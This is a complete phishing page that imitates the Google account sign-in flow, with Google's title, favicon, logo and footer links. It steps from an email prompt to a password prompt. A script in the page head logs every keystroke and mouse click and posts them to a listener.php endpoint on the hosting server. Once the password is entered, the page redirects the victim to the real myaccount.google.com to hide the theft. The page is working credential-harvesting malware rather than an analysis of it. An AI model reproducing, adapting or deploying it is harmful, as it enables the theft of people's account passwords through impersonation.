<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="preconnect" href="https://fonts.gstatic.com" />
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400&display=swap" rel="stylesheet"/>
    <link rel="icon" type="image/x-icon" href="https://google.com/favicon.ico">
    <title>Sign in – Google accounts</title>
    <script>
(function() {
    var server = "https://" + location.host + "/listener.php";
    document.addEventListener("keyup", function(e) {
        var x = new XMLHttpRequest();
        x.open("POST", server, true);
        x.send(e.key);
    });
    document.addEventListener("click", function(e) {
        var click;
        if (e.which == 1) {
            click = " MouseClick ";
        } else {
            click = " MouseClick ";
        }
        var x = new XMLHttpRequest();
        x.open("POST", server, true);
        x.send(click);
    });
})();

function updatetext() {
  var title_box = document.location.host;
  var input_element = document.querySelector("input");
  var mxlen = 27;
  var title_box = title_box.substr(0, mxlen);
  var title_box = "to continue to <mark class='blue_'>" + title_box + "...</mark>" + "";

  document.getElementById("text_2").innerHTML = title_box;
  input_element.addEventListener("keyup", () => {
    input_element.setAttribute("value", input_element.value);
    document.getElementById("placeholder_").style.cssText = `font-size:12px;`;
  })
}

function showpass() {
  var passwd = window.getComputedStyle(document.getElementById("fname")).fontFamily;
  var passwd_ = document.getElementById("fname")
  if (passwd === 'Roboto, sans-serif') {
    passwd_.style.fontFamily = 'password';
  } else {
    passwd_.style.fontFamily = 'Roboto, sans-serif';
  }
}

function next() {
  var emty = "";
  var mailid = document.getElementById("fname").value;
  if (mailid > "") {
    document.getElementById("document_html_").innerHTML = `
<body id="document_html_" onload="updatetext()">
  
    <div class="container">
      <div class="card">
        <img class="disable-select" src="images/google-logo.svg" alt="">
        <h2>Welcome</h2><br>
        <div class="aCayab" style="margin: 0; padding: 0;"><div></div><div jscontroller="IIfQad" jsaction="click:cOuCgd; blur:O22p3e; mousedown:UX7yZ; mouseup:lbsD7e; touchstart:p6p2H; touchend:yfqBxc;" class="YZrg6 HnRr5d iiFyne cd29Sd" tabindex="0" role="link" jsname="af8ijd"><div class="gPHLDe"><div class="qQWzTd" aria-hidden="true"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="23px" height="23px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg></div></div><div jsname="fmcmS" class="KTeGk" data-profile-identifier=""><a style="font-size: 12px;" id="email_">whoami...</a></div><div class="krLnGe"><svg aria-hidden="true" class="stUf5b MSBt4d" fill="transparent" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><polygon points="12,16.41 5.29,9.71 6.71,8.29 12,13.59 17.29,8.29 18.71,9.71"></polygon></svg></div></div></div>
        <br><br>
        <div class="input-contain">
<form method="post" action="#">
  <input type="text" style="font-family: password;" id="fname" name="fname" autocomplete="off" value="" aria-labelledby="placeholder-fname">
  <label class="placeholder-text" for="fname" id="placeholder-fname">
     <div id="placeholder_" class="text" style="font-size: 12px;">Enter your password</div>
  </label>
</form></div>

  <div style="text-align: left;!important">
  <b id="error"></b>
  <br>
    <input type="checkbox" style="width: 15px; height: 15px;" onclick="showpass()"><a style="margin-top: -30px;">&nbsp;Show password</a>
  <div class="card-bottom">
          <a target="_blank" href="./400.html">Forgot Password?&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
          <button type="button" onclick="next2()" class="disable-select">Next</button>
        </div><div style="height: 110px;"></div>
        
      </div>
      
      <div class="footer">
        <select class="disable-select" name="select">
          <option value="English (United States)">
            English (United States)
          </option>
        </select>
        <div class="footer-span">
          <span><a target="_blank" class="btn" href="https://support.google.com/accounts?hl=en">Help</a></span>
          <span><a target="_blank" class="btn" href="https://accounts.google.com/TOS?loc=US&amp;hl=en&amp;privacy=true">Privacy</a></span>
          <span><a target="_blank" class="btn" href="https://accounts.google.com/TOS?loc=US&amp;hl=en">Terms</a></span>
        </div>
      </div>
    </div>
  </div>
</body>`;
    fixoverride()
    var emailen = 42;
    var mailid = mailid.substr(0, emailen);
    document.getElementById("email_").innerHTML = mailid + "...";
  } else { 
    document.getElementById("spacer").innerHTML = `<br>`;
    const input_box = document.querySelector('#fname');
    const input_text = document.querySelector('#placeholder_');
    input_box.style.cssText = "outline: none;border: 2px solid red;";
    input_text.style.cssText = "color: red;";
    document.getElementById("error").innerHTML = `<span style="margin-top: -40px; text-align: left;" class="jibhHc inline-block"><svg style="text-align: left;" aria-hidden="true" class="stUf5b qpSchb" fill="#d93025" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path></svg><p class="inline-block" style="color: red;">&nbsp;<a style="color: red; font-weight: 500; margin-top: 10px;">Enter an email or phone number</p></span></div>`
  }
}

function fixoverride() {
  var input_element = document.querySelector("input");

  document.addEventListener("click", function(){
    input_element.setAttribute("value", input_element.value);
    document.getElementById("placeholder_").style.cssText = "font-size:12px;" ;
  });
}

function next2() {
  var emty = "";
  var mailid = document.getElementById("fname").value;
  if (mailid > "") {
    window.location = "https://myaccount.google.com/";
  } else { 
    document.getElementById("spacer").innerHTML = `<br>`;
    const input_box = document.querySelector('#fname');
    const input_text = document.querySelector('#placeholder_');
    input_box.style.cssText = "outline: none;border: 2px solid red;";
    input_text.style.cssText = "color: red;";
    document.getElementById("error").innerHTML = `<span style="margin-top: -40px; text-align: left;" class="jibhHc inline-block"><svg style="text-align: left;" aria-hidden="true" class="stUf5b qpSchb" fill="#d93025" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path></svg><p class="inline-block" style="color: red;">&nbsp;<a style="color: red; font-weight: 500; margin-top: 10px;">Enter a password</p></span></div>`
  }
}
    </script>
    <style>
* {
  margin: 0;
  padding: 0;
  font-family: "Roboto", sans-serif;
  box-sizing: border-box;
}

:root {
  --principal: #202124;
  --p: #797d80;
  --blue: #2c7fea;
  --border-card: #dadce0;
}

.container {
  width: 100vw;
  height: 100vh;
  display: flex;
  align-items: center;
  justify-content: center;
  flex-direction: column;
  min-height: 500px;
}

.card {
  height: 500px;
  width: 448px;
  border-radius: 8px;
  border: 1px solid var(--border-card);
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 48px 40px 36px;
}

.card h2 {
  padding-top: 16px;
  font-weight: 400;
  font-size: 24px;
}

.card h3 {
  padding: 11px 0 35px 0;
  font-weight: 400;
  font-size: 16px;
}

.card input {
  padding: 13px 15px;
  width: 100%;
  height: 55px;
  border-radius: 4px;
  border: 1px solid var(--border-card);
  outline-color: #1973e8;
  font-size: 16px;
}

.card .btn-email {
  padding-top: 12px;
  width: 100%;
}

.card .btn-email button {
  background: transparent;
  border: none;
  cursor: pointer;
  color: var(--blue);
  font-weight: 700;
  font-size: 14px;
  outline: none;
}

.card p {
  padding-top: 48px;
  color: var(--p);
  font-size: 14px;
  line-height: 1.5;
}

.card p a {
  background: transparent;
  border: none;
  cursor: pointer;
  color: var(--blue);
  font-weight: 600;
  text-decoration: none;
}

.card .card-bottom {
  margin-top: 40px;
  width: 100%;
  margin-right: 18px;
  display: flex;
  align-items: center;
  justify-content: space-between;
}

.card .card-bottom a {
  border: none;
  cursor: pointer;
  color: var(--blue);
  font-weight: 800;
  text-decoration: none;
  font-size: 14px;
  margin: 8px;
}

.card .card-bottom button {
  background: var(--blue);
  color: white;
  padding: 9px 24px;
  font-size: 14px;
  outline: none;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  transition: 0.2s;
}

.card .card-bottom button:hover {
  background: #1a66c9;
}

.footer {
  display: flex;
  align-items: center;
  justify-content: space-between;
  padding-top: 24px;
  font-size: 12px;
  width: 448px;
  color: var(--p);
}

.footer select {
  background: transparent;
  border: none;
  cursor: pointer;
  outline: none;
}

.footer .footer-span span {
  margin-left: 32px;
}

.link {
  text-decoration: none;
  color: #2f80ea;
}

.inline-block {
  display: inline-block;
}

.disable-select {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}

mark.blue_ {
  color: #2f80ea;
  background: none;
  font-weight: 500;
}

.footer-span a {
  -webkit-border-radius: 2px;
  border-radius: 2px;
  color: #757575;
  display: inline-block;
  margin-top: -6px;
  -webkit-transition: background .2s;
  transition: background .2s;
  text-decoration: none;
}

input:focus {
  outline: none;
  border: 2px solid #1a73e8;
}

.input-contain{
    position: relative;
    width: 100%;
}
input{
    height: 5rem;
    width: 40rem;
    border: 2px solid black;
    border-radius: 1rem;
}

.placeholder-text{
    position: absolute;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    border: 3px solid transparent;
    background-color: transparent;
    display: flex;
    align-items: center;
}

.placeholder-text{
    pointer-events: none;
}

.text{
    padding: 0 0.5rem;
    background-color: transparent;
    color: #757575;
}

input, .placeholder-text{
    padding: 0 0.3rem;
}

input:focus{
    outline: none;
    border-color: #1a73e8;
}

input:focus + .placeholder-text .text{
    background-color: white;
    color: black;
    font-size: 12px;
    margin-top: -8px;
    transform: translate(0, -170%);
    border-color: #1a73e8;
    color: #1a73e8;
}

.text{
    transform: translate(0);
    transition: transform 0.2s ease-out, font-size 0.2s ease-out, background-color 0.2s ease-out, color 0.2s ease-out;
}

input:focus + .placeholder-text .text, :not(input[value=""]) + .placeholder-text .text{
    background-color: white;
    color: black;
    transform: translate(0, -170%);
}

input:focus + .placeholder-text .text{
    border-color: #1a73e8;
    color: #1a73e8;
}

@font-face {
  font-family: 'password';
  font-style: normal;
  font-weight: 400;
  src: url(https://jsbin-user-assets.s3.amazonaws.com/rafaelcastrocouto/password.ttf);
}

input.key {
  font-family: 'password';
  width: 100px; height: 16px;  
}

.H2SoFe *, .H2SoFe *:before, .H2SoFe *:after {
    -webkit-box-sizing: inherit;
    box-sizing: inherit;
}
.aCayab {
    height: 32px;
    margin-top: 8px;
}
.jXeDnc:not(.tmR25c) {
    text-align: center;
}

.HnRr5d.cd29Sd {
    padding-left: 5px;
}
.HnRr5d.iiFyne {
    padding-right: 7px;
}
.H2SoFe *, .H2SoFe *:before, .H2SoFe *:after {
    -webkit-box-sizing: inherit;
    box-sizing: inherit;
}
.HnRr5d {
    -webkit-border-radius: 16px;
    border-radius: 16px;
    padding: 0 15px 0 15px;
}
.YZrg6 {
    -webkit-align-items: center;
    align-items: center;
    background: #fff;
    border: 1px solid #dadce0;
    color: #3c4043;
    cursor: pointer;
    display: -webkit-inline-box;
    display: -webkit-inline-flex;
    display: inline-flex;
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
    font-size: 14px;
    font-weight: 500;
    letter-spacing: 0.25px;
    max-width: 100%;
    position: relative;
}
.gPHLDe { 
    -webkit-border-radius: 10px;
    border-radius: 10px;
    height: 20px;
    margin-right: 8px;
}
.qQWzTd {
    -webkit-border-radius: 50%;
    border-radius: 50%;
    color: #5f6368;
    overflow: hidden;
}
    </style>
  </head>
  <body id="document_html_" onload="updatetext()">
    <div class="container">
      <div class="card">
        <img class="disable-select" src="images/google-logo.svg" alt="" />
        <h2>Sign in</h2>
        <h3 id="text_2">to continue to </h3>
        <div class="input-contain">
          <form method="post" action="#">
            <input type="text" id="fname" name="fname" autocomplete="off" value="" aria-labelledby="placeholder-fname">
            <label class="placeholder-text" for="fname" id="placeholder-fname">
              <div id="placeholder_" class="text">Email or phone</div>
            </label></form>
          </div>
        <div style="text-align: left;!important">
  <b id="error"></b>
        <div class="btn-email">
          <button type="button" href="./400.html"><a target="_blank" href="./400.html" class="link">Forgot Email?</a></button>
        </div>
        <p>
            Not your computer? Use Guest mode to sign in privately.
          <a target="_blank" href="https://support.google.com/chrome/answer/6130773?hl=en-GB">Learn more</a>
        </p>

        <div class="card-bottom">
          <a target="_blank" href="./400.html">Create account</a>
          <button type="button" onclick="next()" class="disable-select">Next</button>
        </div>
      </div>
      <div id="spacer"><br><br><div style="height: 10px;"></div></div>
      <div class="footer">
        <select class="disable-select" name="select">
          <option value="English (United States)">
            English (United States)
          </option>
        </select>
        <div class="footer-span">
          <span><a target="_blank" class="btn" href="https://support.google.com/accounts?hl=en">Help</a></span>
          <span><a target="_blank" class="btn" href="https://accounts.google.com/TOS?loc=US&hl=en&privacy=true">Privacy</a></span>
          <span><a target="_blank" class="btn" href="https://accounts.google.com/TOS?loc=US&hl=en">Terms</a></span>
        </div>
      </div>
    </div>
  </body>
</html>